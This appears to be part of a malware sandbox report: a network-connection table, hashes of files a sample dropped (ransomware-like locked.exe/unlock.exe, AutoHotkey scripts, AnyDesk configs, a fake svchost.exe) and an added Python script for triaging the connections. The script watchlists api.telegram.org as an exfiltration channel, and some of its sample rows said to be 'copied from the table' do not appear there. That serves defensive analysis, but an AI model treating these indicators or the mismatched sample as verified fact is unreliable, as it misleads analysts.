| US | 8.8.8.8:53 | 39.111.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| FR | 216.137.52.72:443 | script.hotjar.com | tcp |
| US | 8.8.8.8:53 | 17.97.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.117.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.56.102.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.52.137.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge-hls.sacdnssedge.com | udp |
| GB | 195.181.164.12:443 | edge-hls.sacdnssedge.com | tcp |
| US | 8.8.8.8:53 | b-hls-25.sacdnssedge.com | udp |
| GB | 195.181.164.11:443 | b-hls-25.sacdnssedge.com | tcp |
| US | 8.8.8.8:53 | 12.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:52192 | | udp |
| N/A | 239.255.102.18:867 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:58795 | | udp |
| N/A | 239.255.102.18:60274 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:56830 | | udp |
| N/A | 239.255.102.18:60719 | | udp |
| US | 8.8.8.8:53 | engine-cm.hqscene.com | udp |
| NL | 95.211.140.208:443 | engine-cm.hqscene.com | tcp |
| US | 8.8.8.8:53 | cdn-cm.hqscene.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | cdn.banhq.com | udp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| FR | 52.84.45.102:443 | cdn.banhq.com | tcp |
| FR | 52.84.45.102:443 | cdn.banhq.com | tcp |
| FR | 18.161.111.67:80 | api.playanext.com | tcp |
| US | 8.8.8.8:53 | 208.140.211.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.45.84.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.111.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vstream-38.sb-cd.com | udp |
| DE | 212.102.56.136:443 | vstream-38.sb-cd.com | tcp |
| US | 8.8.8.8:53 | 136.56.102.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vstream-43.sb-cd.com | udp |
| NL | 185.76.10.18:443 | vstream-43.sb-cd.com | tcp |
| US | 8.8.8.8:53 | 18.10.76.185.in-addr.arpa | udp |
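The connection table above mixes three kinds of rows: DNS queries to the sandbox resolver (8.8.8.8:53, where the domain cell is the name being looked up), reverse PTR lookups and multicast chatter generated by the sandbox itself, and the actual TCP connections the sample made. The script below is an added example, not part of the sandbox report, that parses rows in the report's own `| country | ip:port | domain | proto |` layout and separates those classes so an analyst ends up with a name-to-IP map of real contacts, a list of names that were only queried, and any names from an analyst-supplied watchlist. The sample rows are copied from the table above as a constructed input; the resolver address and the watchlist contents (here `api.telegram.org`, only because it is a common exfiltration channel) are assumptions the analyst adjusts, and the report itself makes no claim about which of these hosts is command-and-control.

```python
"""Triage helper for a sandbox network-connection table (added example)."""
import ipaddress
import re
from collections import defaultdict

# Constructed sample: rows copied from the report, including a multicast
# row with an empty domain cell and a name that is queried but never connected to.
SAMPLE_ROWS = """\
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| GB | 195.181.164.21:443 | static.javhd.com | tcp |
| US | 8.8.8.8:53 | 21.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| FR | 18.161.111.67:80 | api.playanext.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
"""

ROW_RE = re.compile(
    r"^\|\s*(?P<cc>[^|]*?)\s*\|\s*(?P<ep>[^|]*?)\s*\|\s*(?P<c3>[^|]*?)\s*\|\s*(?P<c4>[^|]*?)\s*\|\s*$"
)
PROTOS = {"tcp", "udp"}


def parse_row(line):
    """Return (country, ip, port, domain, proto) or None for non-row lines.

    Tolerates both column orders for rows whose domain cell is empty
    (the protocol may appear in the third or the fourth cell)."""
    m = ROW_RE.match(line)
    if not m:
        return None
    ip, _, port = m["ep"].rpartition(":")
    c3, c4 = m["c3"], m["c4"]
    if c4.lower() in PROTOS:
        domain, proto = c3, c4.lower()
    elif c3.lower() in PROTOS:
        domain, proto = c4, c3.lower()
    else:
        return None
    return m["cc"], ip, int(port), domain or None, proto


def triage(text, resolver="8.8.8.8", watchlist=()):
    """Classify rows: resolver queries, PTR/multicast noise, real connections.

    Returns a dict with
      'resolved': {domain: [ip, ...]} for non-DNS flows that carry a name,
      'dns_only': names queried at the resolver but never connected to,
      'flagged':  names (queried or resolved) present in the analyst watchlist,
      'noise':    number of PTR and multicast rows discarded.
    """
    queried, resolved, noise = set(), defaultdict(set), 0
    for line in text.splitlines():
        rec = parse_row(line)
        if rec is None:
            continue
        _, ip, port, domain, proto = rec
        addr = ipaddress.ip_address(ip)
        # Sandbox-generated background traffic: reverse lookups and multicast.
        if addr.is_multicast or (domain and domain.endswith(".in-addr.arpa")):
            noise += 1
            continue
        # Query to the configured resolver: record the name, not a contact.
        if ip == resolver and port == 53:
            queried.add(domain)
            continue
        if domain:
            resolved[domain].add(ip)
    dns_only = sorted(queried - set(resolved))
    seen = queried | set(resolved)
    flagged = sorted(d for d in seen if d in watchlist)
    return {
        "resolved": {k: sorted(v) for k, v in resolved.items()},
        "dns_only": dns_only,
        "flagged": flagged,
        "noise": noise,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS, watchlist={"api.telegram.org"})
    for name, ips in sorted(result["resolved"].items()):
        print(f"{name:30} {', '.join(ips)}")
    print("queried only:", result["dns_only"])
    print("watchlist hits:", result["flagged"])
    print("noise rows dropped:", result["noise"])
```

Feeding the full table to `triage()` instead of the sample gives the set of hosts worth pivoting on (the CDN and advertising domains will dominate, with `api.telegram.org` and the AnyDesk-related traffic standing out), while the dozens of `in-addr.arpa` and `239.255.102.18` rows drop out as sandbox noise.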
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4dc6fc5e708279a3310fe55d9c44743d |
| SHA1 | a42e8bdf9d1c25ef3e223d59f6b1d16b095f46d2 |
| SHA256 | a1c5f48659d4b3af960971b3a0f433a95fee5bfafe5680a34110c68b342377d8 |
| SHA512 | 5874b2310187f242b852fa6dcded244cc860abb2be4f6f5a6a1db8322e12e1fef8f825edc0aae75adbb7284a2cd64730650d0643b1e2bb7ead9350e50e1d8c13 |
\??\pipe\LOCAL\crashpad_4612_JGLVVWSPOGSKVTJC
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c9c4c494f8fba32d95ba2125f00586a3 |
| SHA1 | 8a600205528aef7953144f1cf6f7a5115e3611de |
| SHA256 | a0ca609205813c307df9122c0c5b0967c5472755700f615b0033129cf7d6b35b |
| SHA512 | 9d30cea6cfc259e97b0305f8b5cd19774044fb78feedfcef2014b2947f2e6a101273bc4ad30db9cc1724e62eb441266d7df376e28ac58693f128b9cce2c7d20d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ef598bd0ee14c2c1bad2d36e45ace7bd |
| SHA1 | 247b2c4efa6966824d158d3871ca832a27583d3f |
| SHA256 | 3239774e7a3a121f9b74074764ec5498577c2cea99df8ee68bddcc71508a9cca |
| SHA512 | e7f31d8c7bc2794509b5d675490b6701605c2c2e08fdc08144b945af816d65927994223eeb9c53cf014e07c5c105bfc83e7e45a0cc33f2c8d0525ceea2ed0cf7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4a0899cfefad47cd2441e4b3d829899a |
| SHA1 | ab26377aa30b79f2102958446c1856fe9bbfd896 |
| SHA256 | 3ea498e050e4fde73e64bdcef4b62771c72e14c3a6f6407e06ad63000967a19e |
| SHA512 | f765ee2e8604b87ee455fd55be329cb5546ec9bb5066ed4080a623e942a197ae6d375cf2d4db5e7d7663375151e5b7e46d0980936076360076e01b08061a8b5c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6b9ced08cbec67475b335b9f26466969 |
| SHA1 | 831c75d18222794b6801b883fb0da3e73cf137ee |
| SHA256 | 899c05c55fbd06dccdc6f673992eb8399bb069efa90894009b5a953ade3a78a4 |
| SHA512 | 31d8fa33de44f1af1546eb01c0c5828cf95679d0ab0789853bc51de4049433deae88953434ba8452261657cd1b92cc2f7a225320592498bb2fbcda43d674c172 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e9b3c9253c2f07ce2010a6d30958ddf8 |
| SHA1 | 407e52a56467a765ae8e8a23db0627d179d50089 |
| SHA256 | 34e0572ceeabbc390ea84fcafc7a0298dc6bf9024107308eecc594a4485c0d38 |
| SHA512 | 1fb4ec622902428b150a6d842f8e151afcbaa808515e005fd8c0b6742f69f6f4f3d2e9bcbf8c8b8ee95eb1879f1d080495b5b23ffb3fb3059688b681f5a70005 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57bdf1.TMP
| MD5 | c60c14f0bb2d98ff120f248d6eba788d |
| SHA1 | 34e53a1bb93f911832d3f06a6efb20329af229ea |
| SHA256 | 46185ca28082d3bcafb831304f26cec07608bfc09c1a8b6beb82b83d221a80af |
| SHA512 | 5eb1fcbdffe503e7e5abe9092a3877df02f3610213f2df60459fb06c7bb3b3e59bb26d49344a553dd86fbd1ed866248fb8a7bd8441632441244d17f134675705 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2221490886625b6d5435864b88a0b566 |
| SHA1 | 63116be27b50b8c771ea95e5f8514ff6e43ac134 |
| SHA256 | 23ad44119fe7fd9ae64497f73c0d7ca4a6e96b73913433ae452020920ddb4fe1 |
| SHA512 | ff6206238b3248e1e2ecaeaf5b3c06a42254eb180e82e9994652057b6ecfc32da4bbff24095917a20b01f8256c7f5fed3afbb329edccdd31bfae39b91d568333 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c6667a1474519c6d0c881190bfbb8e67 |
| SHA1 | ec34f72a37d8772b7d16bc2ab37e416fb5df98ca |
| SHA256 | 6bb64ca35ef2005b6a65ffdb222e2e570d1ef1ec97479d34cc8d36cd47c8214b |
| SHA512 | 6d438e31b9ed192a25c7bdcdac3af57c795db9636e8daf781c2fcd521a2fd271ffc7f8641aac289ad1c13072b156cfd2ea7a61ba59666c707c489e569438dec4 |
C:\Users\Admin\Downloads\Unconfirmed 493133.crdownload
| MD5 | e10b6631d11b3f4aabb1256da4296588 |
| SHA1 | 2949c1316f6036b3f13d128fb048b78229c49755 |
| SHA256 | 0a2476399914219d49f77018ccaf1412811d1b8464d1bab4057bc1c1763e1ac4 |
| SHA512 | 7ecfe5fc310ebc500a7f7f7136ef5dd886ef7de35d35648a5a0d6f0a12d95c4282ab87b358a1bf151e9f7efeaddc946f5d2b7b357eee24c150baee8761136234 |
C:\Users\Admin\AppData\Local\Temp\2C5A.tmp\2C5B.tmp\2C5C.vbs
| MD5 | d9c7f4fd88a8a0d08f8181c4bfd21b72 |
| SHA1 | 2c72ed965a31bd8b39013b12099b244df58fa8e1 |
| SHA256 | 65537c23d5789c2f574f961f5d34a04391ffffa4ba92a9b448f1946e7ede4a6f |
| SHA512 | f9c23cfb1550be89d1c47109491738e5471b1ed514fde58581f6769ebfd03b97ab32999d8cdb2977e60f1b166c47b2d41cbacbc78718312c638246b5ad04b78b |
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
| MD5 | af75667a7f08a01ae6d7e174922690db |
| SHA1 | bcacd4fc04d1c794dc6ad5b10fc08c4036de8680 |
| SHA256 | 35b7037d72cb861847025ffe8bb5d70eff3e88f544e8c203da2e61c0f5b9ca4d |
| SHA512 | d99b222040fb74650faceaa48543e956ccb48a3483c977b966a2807cf017e4d74f53d8c90ea6139fb3e490949a62a055827a00f3c110d2629cfe34020c9d3d10 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3172b5168f1132b07e11e924e44db0a5 |
| SHA1 | d759d53001b18f12233b8c1c008811d327605888 |
| SHA256 | 118d9b39bababd5d92271e63f810ca7a465d311ba40148a17a46c3124b20af13 |
| SHA512 | 5efa3806353bf0c04e72191c5cb7e8735696a053358cba682f22665a3e35ed918c1b9855b41413e00bbf95108adadc24a2d9ccb8547cb06ba385ebb932b52351 |
C:\Users\Admin\AppData\Local\Temp\30BF.tmp\30C0.tmp\30C1.bat
| MD5 | 01a143a4c96cd68edc098eec28b92605 |
| SHA1 | 28d4fb883af2cfcf2fc2690cb548c163fff98732 |
| SHA256 | 8864c3567c339c798f6a46a6dd17ae8f19a1fbac8f523838e926edc6251d79e5 |
| SHA512 | 9ca26669e31d25fd8b1302c9e5bb72e78612fe6158b5c497f8d69895bce81478f06d104d725b3de1767573209d7837d33ce489262c04380e3bda706cae3b4886 |
memory/3444-243-0x000001E2037D0000-0x000001E2037F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a1yq0u2v.vqc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\unlock.exe
| MD5 | f32796f45fbba3baaf45340c9d8d1c05 |
| SHA1 | 813dc87e3d366a255d5df01400540092cab5f62d |
| SHA256 | 62b01a0b44849da4a147e9742cbe0f39742fc522157c470157b023122aa22902 |
| SHA512 | 9a9813aabed7a6a16a5d79f2569192c53321f08e9c6868e3421d3ee7db4c139a8b124ac16b275230da16457e3ae5422423b47e3dbc2f80751891a885f6c09d84 |
C:\Users\Admin\AppData\Roaming\locked.exe
| MD5 | 6d97d6c2be27f7633da8432a5f90ccd2 |
| SHA1 | 5ffca0110e122848b772e563f74c057d7f782664 |
| SHA256 | 47b78d957e366dbf484d44bca911f41a7a795309e0d3e4c9d08fdc135efbb77a |
| SHA512 | 518e5678a7631258f2373d7f76987f668531e972e04d5bdbdf8aacb2e2a568af618b1e4f338a289edf11e419cc6b4813e95c4433e0e849243d10e10a895cbfce |
C:\Users\Admin\AppData\Roaming\doorbell2.ahk
| MD5 | d61c68849186eb9dbea169cceb79c2a6 |
| SHA1 | baca62e884a3d7dccae18ef64096db4d562def39 |
| SHA256 | 6c4daf8ef0da2cf0ac079637a5c3062a610c4c710c7e4c55eedd1b010337bb1e |
| SHA512 | deec0d4cb912d64db281459e8d01b21583fd7df3c46ea02cb66fffb5378ac6e1f375cb18f30ddccd908fc0c98d14094ea1620699f93498fc8c7be579a3a5d0b0 |
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
| MD5 | 2d0600fe2b1b3bdc45d833ca32a37fdb |
| SHA1 | e9a7411bfef54050de3b485833556f84cabd6e41 |
| SHA256 | effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696 |
| SHA512 | 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703 |
C:\Users\Admin\AppData\Roaming\enc1.mp3
| MD5 | bbb44733d6b0bd75d6a26a9a4427705f |
| SHA1 | c29d6ec521f30efb23331648a4a7a234b2db3894 |
| SHA256 | 33b5c07a614eadb209b95b48454a10b1251809f8cc896577de5e117144b58507 |
| SHA512 | b846dce3ed1814e17b4f1a43910589e752e2ac911132d18275ff4d179796f1e7928a32636327a681d7c01edd704bec2efc8a12692597205bb334895c9063ceb3 |
C:\Users\Admin\AppData\Roaming\doorbell.ahk
| MD5 | 952ea1033b5f83c25ce5133944e4a65d |
| SHA1 | 9f50c5a2fb4aee93d154758c66d9ca81fd5fe3c5 |
| SHA256 | 163b07a09d117ff1bdeb20ed83c1ebfb0917ce72ec63d32b4b6f8f87902f604a |
| SHA512 | b500ceadee155d4f5e39348e205ce8339605732e82564545c04c9ac2a718ea7135fdc37ee8b3f60d035d26fae114022f04efd57e2cc9feb1231e18051c307785 |
C:\Users\Admin\Downloads\AnyDesk.exe
| MD5 | aee6801792d67607f228be8cec8291f9 |
| SHA1 | bf6ba727ff14ca2fddf619f292d56db9d9088066 |
| SHA256 | 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499 |
| SHA512 | 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f |
C:\Users\Admin\Downloads\svchost.exe
| MD5 | 1b0a49b12fb2cfc89d01cf29b8d4f875 |
| SHA1 | 2bbf873025c5c95f030de72a8a68d5d2e7b23c3b |
| SHA256 | b6ed5fdbece483fba8c67c52efbc57d77e126b032bd031f4bf68224f5c96459e |
| SHA512 | 94844cbf5c3995d3d719c5d77d1c1ab3a02269d3fbd2ef1822e301bc96441976d53b169ac982015804d28fdb1e52efc59604fed0c90bb196511f70039947fe86 |
C:\Users\Admin\Downloads\conhost.exe
| MD5 | ed4dc64d9940cae8a4ee5ee11f173899 |
| SHA1 | 39476f1d852d3fb66a4083ddfb2244ebc84d5fb0 |
| SHA256 | 49f011400451dc569c8828e8a28f74e3634e9f5bb4d3908c518c4c7d4955a18f |
| SHA512 | 5cb60f856110b7114c83805ed830a6e82e815caa8ac7cc2e07e6fc977aa5a7180a9b8d1b10df5304d5b9d063e5d39f5468a5a9c74c895c0a4c491c30292e86b1 |
C:\Users\Admin\Downloads\stn.exe
| MD5 | 8b3f80e850af1c7883f2b1df4dfebf8c |
| SHA1 | 24a528e8ffd5729faa43e3beaf3e75d85aa191e6 |
| SHA256 | 9a1760335cd16e20dda90c98e6a81a501567d016bae1b2e5f4452bfdf6ae2bae |
| SHA512 | 1168a0af7f36b168e27770f7be492201632c72f1f50bec0989e86a55254aa9f6825cbce418b4f73af8573e0e4d410638e8e1304ea78d2807a5448a0d695bd253 |
memory/4320-267-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/1844-274-0x00000000000C0000-0x0000000001809000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 7bd3c01aad7c2700e72c7abd4a2231e1 |
| SHA1 | fecf2e4e7ad01fb4f46c0756c31ca3e9aad7026c |
| SHA256 | 124930bfd6d86a2398b329b1044e8202337d83331d12c2ab7a10d1a11d326435 |
| SHA512 | 3df97663bd043feb878842bac899e57469bec33793f10c78713c93e4a5f74f87be1ec5a7a69b4ebd4966553727d2eb9cc499bb499bb6eff3c21784a8b319571f |
memory/3048-276-0x00000000000C0000-0x0000000001809000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | ace28531320aef140422ddc9d1d52727 |
| SHA1 | 5ce6eb296a5c7bf9bd7f49094f2a568d9a9cb2f4 |
| SHA256 | 8dc5e7d56b13b24dabf79cc9c96999d495cf47607b2eaa6a22666463c804c5a1 |
| SHA512 | 435b5c575704d2e0af97eeeb15ad1555e6bec3b383c3566d69b43719f212e94b818ce315edda0180c4d67e9d542686c10fc0c0fe8696541bdc4b536be1542dde |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 20f8980f388313882c05c0f51ced9f9c |
| SHA1 | a865ee189189e3b2cad12b1eda2b03cb5634d387 |
| SHA256 | 28a649a9b7d87d393103e6cb629da9d6696b0964edff538e818c0b0a7cdf795b |
| SHA512 | f2611cef7b65bf3db6e2bf11e1e38fb45e22d1932c0b525e611619ff20501dcc6090bfe16c03451d29f7db0dbb2afb39ac73e3a37c9e7fa6d10b59bd1e6cfaf9 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 3ec0ed41a108da207e7f266dff51d160 |
| SHA1 | 3ed0087917e57a2af0b78d78330a7e4941e05807 |
| SHA256 | 36768f8b2de0403eafa7b7b46d6d3642770446811cf7978576f4221c12734127 |
| SHA512 | 4a7e1a9f6a124b3902a1732e330c266799d28cc43e34a49568ea26c0ef697fba20bbc49d2a1f8168ff2e43188b18a9be8189421bb3e0db9d179ff899ce6b6166 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 45a2a2c206528304448a25bffd7c288e |
| SHA1 | fdf8e9323fd7851cbc7a4834bc33f458b00ff41d |
| SHA256 | ec888ce071ab7b5159a3a8ac8505bf6d223a1f0ac74c8978c1df39fccacd74df |
| SHA512 | d23d6abc2035f5d13d2605184b177690fc161a0cd3b9d50d532a292733bc54ddec11e351a57d42595cb907e66a7aa6a0c3ccdb27c150e208f41db269d897cfd3 |
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf
| MD5 | fba8b48741ecb7ff6e7555fa8af07207 |
| SHA1 | bc56870285c3887dbe5452b56376c0582d65c0d4 |
| SHA256 | 5a18a9b71461080252502ce2192dc4732fd1e4679fd5c811d3309c22517172a3 |
| SHA512 | 6a3fe0bd3033f512a779bd1eaba244f52ea4b3fd813d571626aed281e1899aeb72fe98f73e0ef2475390b98e63131c5bba7536f586ae9fefcbd20cbee1f9f786 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 227556da5e65f6819f477756808c17e4 |
| SHA1 | 6ffce766e881ca2a60180bb25f4981b183f78279 |
| SHA256 | 101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4 |
| SHA512 | d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | acf4c50ce95dd519f8387b27cc2f73cd |
| SHA1 | 6f5ce0e9a6fd06ea101af732b3c3a4f37558c748 |
| SHA256 | e6a0e84acebbdd7b36466a43bd993b64632d552e0b33976ce6e8fc3cb368932d |
| SHA512 | 4ac691e39948190dc5adec78fa8b0bb2c0452007714264af42c43e880e1ebd4ff71b54f5f57659ccb760ff121d220fe20e021669fe10250d46b906691a2e02ef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4fa1f09e15f1771eec492d9e26533367 |
| SHA1 | 02077099e7ebbd75f802dd80d7e757caa6d3943a |
| SHA256 | dc3986ac1e5bb860c2000231781d5d56fa371f46c2a23a181c4bf2d72ece90a1 |
| SHA512 | bb0ed861c34c96efdd06bbd938cf092e131936c69554a4d52f11154cc583a410bee30fa7bb84141917d799a8335f7e5a82da3012c233c47532f0950b84c3ce01 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | c12e1e138c781d5ff957e862c068215e |
| SHA1 | edc99c2eb643f7998ec4890c2156bcc7e4d22caa |
| SHA256 | c5264289ae83eea332be17f9017950c6725001aadf9f5b8283849a451480a2dd |
| SHA512 | 42f0a3f9e493b7ba674576ef0a9c13d3190d2f48f666e2f4f1ac8f1c1ba4f89880fd7f9beac8a088640dd990abc0c35688c8f34be645a36803d7f838d034bf49 |
memory/1844-403-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/3048-404-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/5412-425-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/5452-430-0x0000000000AB0000-0x00000000021F9000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | 69bec68692e724a4adc3656924a40ab7 |
| SHA1 | 1273c2133beda28c9c6b343d625a03e7834b4055 |
| SHA256 | 1ce51865192e8270ba80ceac4404ccfc4ca869f5c5c59d28b9115b30b619ae8a |
| SHA512 | 3f5eacbc5f19b90babb678e7138138883638ee65893dd54fd3b9fd27ec88adb6e906c88fc7884706750f91d7246a59fbe408546165caa3b421f58b0f9a201937 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 65be605eef6a6d064a22760ecff21b39 |
| SHA1 | bec4df917e1ae277fa7fece0339acb17984914e4 |
| SHA256 | 4c867d8703fee5c12d5b915ef134280326f619774d7a9c5a51b3fd703eeacc7b |
| SHA512 | 755cce972bb8f88422fda2f3a335b59fbb451e577e8f59dda318c479fa74a6e1f4cb82e17f724a007a18f0b11724f0f020f045d6a04dbc6df117e60ab329e2dd |
C:\ProgramData\AnyDesk\system.conf
| MD5 | d04a3ec9a5dba70049f7c844445c6191 |
| SHA1 | 127bc62e302061162ebefcb979c0cc93de71bba9 |
| SHA256 | 7f10692f2bde7168f643fcaf9f0eccd910b799436eaaf7700e9ec021b5491c1f |
| SHA512 | 340e88951183d0ea88bae5b9ea935e6c722fbe0727f85cce536aa582cc2dc753117adb733180d560397b1b23f4bf6beae6a21cf69e6e82a0207906e755cbcddc |
memory/3940-537-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/4320-548-0x00000000000C0000-0x0000000001809000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 78240107280190d04d503abab31c7245 |
| SHA1 | c8259646f2e35f1df2c2c5b4065a1d6b24f5876e |
| SHA256 | cf8fded733ef118d338429fd77869c05738d2e860e02e496d24747286fbbf0ba |
| SHA512 | 3a1756a5e95b2c070480006a156e7a93d3da8d624afa239ae8bb6bfb0edf59e49094ada10bc021d3aebd1e4b97c81a3710df1e1762fb1ebabb4b567b71d77f29 |
memory/6712-550-0x0000000000AB0000-0x00000000021F9000-memory.dmp
memory/7024-577-0x00007FFB1E360000-0x00007FFB1E394000-memory.dmp
memory/7024-581-0x00007FFB1E060000-0x00007FFB1E071000-memory.dmp
memory/7024-580-0x00007FFB1E080000-0x00007FFB1E097000-memory.dmp
memory/6712-597-0x0000000000AB0000-0x00000000021F9000-memory.dmp
memory/7024-579-0x00007FFB1F400000-0x00007FFB1F418000-memory.dmp
memory/7024-578-0x00007FFB1E0A0000-0x00007FFB1E356000-memory.dmp
memory/7024-575-0x00007FF76FA00000-0x00007FF76FAF8000-memory.dmp
memory/5584-625-0x0000000000AB0000-0x00000000021F9000-memory.dmp
memory/5584-640-0x0000000000AB0000-0x00000000021F9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 8b4be4276d7dfddc74a9711b4fdf8940 |
| SHA1 | ff9da1017d3bb2d37b8232b0b1453fc0573eda6a |
| SHA256 | 9ec2d55ebcbee44ce56a4e7077bb6e568ca8fc5571941124b4c1e2555a84c08c |
| SHA512 | 27c97de17c027a5466cdab9e1942899e8d5f9ad157c4bf49875cacd1a4982e80909350f51ccda836e4f34f1c43993125a7537c064175b387733842f8dbcb5faf |
memory/7072-700-0x0000000000AB0000-0x00000000021F9000-memory.dmp
